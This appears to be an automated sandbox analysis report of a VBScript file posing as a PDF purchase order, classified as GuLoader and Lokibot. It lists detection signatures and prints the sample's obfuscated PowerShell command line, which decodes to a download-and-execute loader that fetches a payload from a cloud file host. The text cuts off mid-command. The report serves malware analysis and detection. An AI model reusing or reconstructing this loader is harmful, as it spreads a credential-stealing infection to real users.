Edit tour
Windows
Analysis Report
SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
Overview
General Information
Sample name: | SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | SOLICITUD DE PEDIDO (Universidade de So Paulo (USP))09-30-2024pdf.vbs |
Analysis ID: | 1523156 |
MD5: | 8de3bba9fb959d08b3719f1281957c56 |
SHA1: | b8132af0e02ecb58c3c3eb39fe919e3b805106cf |
SHA256: | c2df6879029285a4edb1e60526812177c3ac1b7293e5b5f05d8250d682641e25 |
Tags: | Lokivbsuser-abuse_ch |
Infos: | |
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5876 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\SOLIC ITUD DE PE DIDO (Univ ersidade d e S#U00e3o Paulo (US P))09-30-2 024#U00b7p df.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 5972 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Daddy S abe Kreprv en Henstte lsernes Br nesengenes Ribwort # >;$Tiberiu s='Forvoks et';<#Tang loppers Vi ndroses Kl assesamarb ejde Atomm issilernes Mngderaba ttens #>;$ Bumblebeef ishes=$hos t.PrivateD ata;If ($B umblebeefi shes) {$Dr iftssikrer e++;}funct ion Strato cumulus($U dtagelsens ){$Variant ens=$Bibli opegistica l+$Udtagel sens.Lengt h-$Driftss ikrere;for ( $Presnin gers=5;$Pr esningers -lt $Varia ntens;$Pre sningers+= 6){$Deanne +=$Udtagel sens[$Pres ningers];} $Deanne;}f unction Ro mancerne($ Amphiblest ritis){ & ($Perijo ve) ($Amph iblestriti s);}$Termo meteret=St ratocumulu s ' ,iveM GroloB uff z,ndadiMon otlb,ombl, akanaoverd /Incom5Klu mp.Ojibw0 Dest myelo (BrevsWAnd reiGon pnT ogosdSkraa oBkkenw nb lisQuant . ldtaNComme TBly n Sky de1Chefa0B u fo. Adri 0 Sand;Inr ad ForeWCh apliFodern Back6U.en f4 Clum; A tli Detacx Efte.6Won s4vippe;T chn El oqr Prog vCopu b:Fusio1,e gra2U eff1 isje.Usse l0synge) s sev Out lG ExpedeTrin sc annk.nr epo Prei/I nten2str.t 0 asth1but ti0 ,nds0T opta1themi 0 Blaa1 to gs Buks FL eneni Daas r ReexeUva tefGgekaoQ rparxPert / Tred1Kur s.2 Bifi1 Anxi.Fleck 0G obo ';$ Redaktione rnes=Strat ocumulus ' B lfauSelv SSubmieAn kleR Mis,- skrifASnes ,gDisgaeUd viknSte,et Udst, ';$C oadjuvant= Stratocumu lus ' Unco h Studt ar oktVagttpS tares H po :S bcl/ Ra ng/InevidB uglorUncon iO twavBem uze.rlle.A sbesgBrigh oDepreoRds ptgprocrlS al meKej e .ArrtecVan dioLabormS yre / Prin uOpistcBar se? DyspeC asquxBr ti pEks mo lt er FormtDe ik= Placd Sy,cooRane ewTilganDu ,sllPlaneo Enr qaId o ldCrean&Un thoiMa sed Forst= Hon o1 Ferr1Un barzChondM UndezBoxc az Weinw s innHOrdkl9 UngarHLeca nUTekstCVe rmuNPropeK Tabul5En e d3CrapaAUd slagPrepaF ErasjrGtep abForbrFSt emm7Py opX Nonpai Are F St.inAn ticf Barbq Fre.8Tube rbS ubh_ t o suBikin ';$Tarnal= Stratocumu lus 'Abbre > Mayw ';$ Perijove=S tratocumul us 'ele.ti PostoeV,jl ex ddor '; $hovedmand ens='Galen es';$Sabuj a='\Tavell .Vrd';Roma ncerne (St ratocumulu s 'Un er$W eekegAfspa l ForeoCol tsbDowsaaZ on il Bla : myskLPrc eduGlycek hjlpsTekst uGdni sPro skvSophrrb artoeFraxi lPolytsInk w,e UnrerT rucknInciv e Folk= E gr$Amanie Puren Bund vSupe :Tr kna SodapF ictipTeach d rseaGene rtMngdea P ri +Stoer$ InvasSb rg eaStt.ebTi eleuPteroj Servia ,ro l ');Roman cerne (Str atocumulus 'Therm$Sh aregcatall GrundoAmat rbdoed.a P erilSkr,a: ReignKaure anH nnra U rinl aandd ernieStru bnYogeed U dsmeFatte= R tin$Surm eC KommoDi t aaLe igd Afv kj Enc au SidsvSk ovfaTelt,n ,pkalt Hop k.Omdiss , laepFlle l TusseiAnge .tGen e(Ti de,$KopisT Can aVars lrImpasnFo rgaa.ystel Formu)Vurd e ');Roman cerne (Str atocumulus